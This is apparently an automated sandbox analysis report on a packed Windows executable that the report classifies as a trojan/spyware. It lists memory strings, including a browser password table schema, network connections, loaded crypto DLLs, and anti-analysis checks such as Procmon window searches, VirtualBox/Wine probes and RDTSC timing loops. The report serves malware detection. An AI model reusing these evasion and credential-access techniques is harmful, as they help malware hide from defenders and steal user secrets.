                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: 0gnHF2twcT.exe, 00000000.00000003.1603777248.0000000005280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49714 version: TLS 1.2

System Summary

                Source: 0gnHF2twcT.exeStatic PE information: section name:
                Source: 0gnHF2twcT.exeStatic PE information: section name: .idata
                Source: 0gnHF2twcT.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A389B00_3_00A389B0
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A389B00_3_00A389B0
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A3DB280_3_00A3DB28
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A3DB280_3_00A3DB28
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A3DB280_3_00A3DB28
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A3DB280_3_00A3DB28
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A389B00_3_00A389B0
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A389B00_3_00A389B0
                Source: 0gnHF2twcT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0gnHF2twcT.exeStatic PE information: Section: ZLIB complexity 0.9973980629280822
                Source: 0gnHF2twcT.exeStatic PE information: Section: mimqpfga ZLIB complexity 0.9946124506039368
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 0gnHF2twcT.exe, 00000000.00000003.1557213361.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1557098653.0000000005201000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1578229101.000000000527C000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1578012510.00000000051EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 0gnHF2twcT.exeReversingLabs: Detection: 57%
                Source: 0gnHF2twcT.exeVirustotal: Detection: 54%
                Source: 0gnHF2twcT.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile read: C:\Users\user\Desktop\0gnHF2twcT.exeJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll
                Source: 0gnHF2twcT.exe Static file information: File size 1881600 > 1048576
                Source: 0gnHF2twcT.exe Static PE information: Raw size of mimqpfga is bigger than: 0x100000 < 0x1a3200

                Data Obfuscation

                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Unpacked PE file: 0.2.0gnHF2twcT.exe.70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mimqpfga:EW;grnkiruz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mimqpfga:EW;grnkiruz:EW;.taggant:EW;
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: 0gnHF2twcT.exe Static PE information: real checksum: 0x1cffc8 should be: 0x1ce053
                Source: 0gnHF2twcT.exe Static PE information: section name:
                Source: 0gnHF2twcT.exe Static PE information: section name: .idata
                Source: 0gnHF2twcT.exe Static PE information: section name:
                Source: 0gnHF2twcT.exe Static PE information: section name: mimqpfga
                Source: 0gnHF2twcT.exe Static PE information: section name: grnkiruz
                Source: 0gnHF2twcT.exe Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A39AAF push FFFFFFDBh; iretd 0_3_00A39AC0
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A39F2D push esi; retf 0_3_00A39F30
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A321CA push ecx; ret 0_3_00A324EA
                Source: 0gnHF2twcT.exe Static PE information: section name: entropy: 7.980219456440776
                Source: 0gnHF2twcT.exe Static PE information: section name: mimqpfga entropy: 7.95348924063239

                Boot Survival

                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\0gnHF2twcT.exe System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: C83E0 second address: C83E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: C83E4 second address: C83EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: C83EA second address: C8400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602E2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: C8400 second address: C8404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: C8404 second address: C7C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F05491602E4h 0x0000000e push dword ptr [ebp+122D0009h] 0x00000014 cld 0x00000015 call dword ptr [ebp+122D2BB0h] 0x0000001b pushad 0x0000001c cmc 0x0000001d jmp 00007F05491602E8h 0x00000022 xor eax, eax 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D3072h], edi 0x0000002b jnc 00007F05491602DCh 0x00000031 popad 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 jp 00007F05491602EFh 0x0000003c mov dword ptr [ebp+122D39EFh], eax 0x00000042 pushad 0x00000043 mov edi, eax 0x00000045 mov dword ptr [ebp+122D3072h], ebx 0x0000004b popad 0x0000004c mov esi, 0000003Ch 0x00000051 mov dword ptr [ebp+122D2E43h], eax 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b jg 00007F05491602DCh 0x00000061 mov dword ptr [ebp+122D2BD8h], esi 0x00000067 lodsw 0x00000069 mov dword ptr [ebp+122D3072h], ebx 0x0000006f sub dword ptr [ebp+122D2E4Ah], ebx 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 cld 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e jmp 00007F05491602E7h 0x00000083 nop 0x00000084 push edx 0x00000085 jmp 00007F05491602DBh 0x0000008a pop edx 0x0000008b push eax 0x0000008c pushad 0x0000008d push eax 0x0000008e push edx 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: C7C06 second address: C7C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247511 second address: 247526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F05491602DEh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24766E second address: 247672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247672 second address: 24767B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24767B second address: 247682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247682 second address: 247688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247688 second address: 24769C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0549119936h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2477FA second address: 24780A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24794C second address: 247963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247963 second address: 247969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247ACD second address: 247AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247AD1 second address: 247ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247ADD second address: 247AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247AE3 second address: 247AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249F02 second address: 249F08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249F08 second address: 249F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249F0C second address: 249F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249F10 second address: 249F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov cx, 89D0h 0x0000000f push 00000000h 0x00000011 stc 0x00000012 push E9CBCAA5h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F05491602E9h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249F42 second address: 249F47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249F47 second address: 249FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F05491602D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 163435DBh 0x00000014 mov cl, EAh 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D2AC2h], ebx 0x0000001e push 00000000h 0x00000020 jmp 00007F05491602E6h 0x00000025 push 00000003h 0x00000027 or dword ptr [ebp+122D298Bh], ecx 0x0000002d push 87DEDFDCh 0x00000032 push eax 0x00000033 push edx 0x00000034 jng 00007F05491602EDh 0x0000003a jmp 00007F05491602E7h 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249FA9 second address: 24A011 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0549119942h 0x00000008 jmp 00007F054911993Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor dword ptr [esp], 47DEDFDCh 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F0549119938h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 lea ebx, dword ptr [ebp+12455D28h] 0x00000036 jmp 00007F0549119942h 0x0000003b sub esi, dword ptr [ebp+122D2EE0h] 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jo 00007F054911993Ch 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A011 second address: 24A015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A015 second address: 24A01A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A06E second address: 24A0A7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F05491602D6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 and ecx, dword ptr [ebp+122D2B43h] 0x0000001a add dword ptr [ebp+122D2CE2h], ebx 0x00000020 push 00000000h 0x00000022 sub esi, dword ptr [ebp+122D29A1h] 0x00000028 push 390B6A6Fh 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 jns 00007F05491602D6h 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A0A7 second address: 24A122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119942h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 390B6AEFh 0x00000010 mov cx, 7DCAh 0x00000014 push 00000003h 0x00000016 mov di, A54Dh 0x0000001a push 00000000h 0x0000001c cmc 0x0000001d push 00000003h 0x0000001f call 00007F0549119939h 0x00000024 jmp 00007F0549119947h 0x00000029 push eax 0x0000002a pushad 0x0000002b jmp 00007F0549119948h 0x00000030 push edi 0x00000031 push esi 0x00000032 pop esi 0x00000033 pop edi 0x00000034 popad 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F054911993Ah 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A122 second address: 24A127 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A127 second address: 24A14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F0549119945h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A1F5 second address: 24A1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A1FF second address: 24A235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F054911993Ah 0x0000000c nop 0x0000000d and dh, FFFFFFE1h 0x00000010 push 00000000h 0x00000012 push 8D5E998Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0549119948h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A235 second address: 24A23B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 25C9A5 second address: 25C9AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
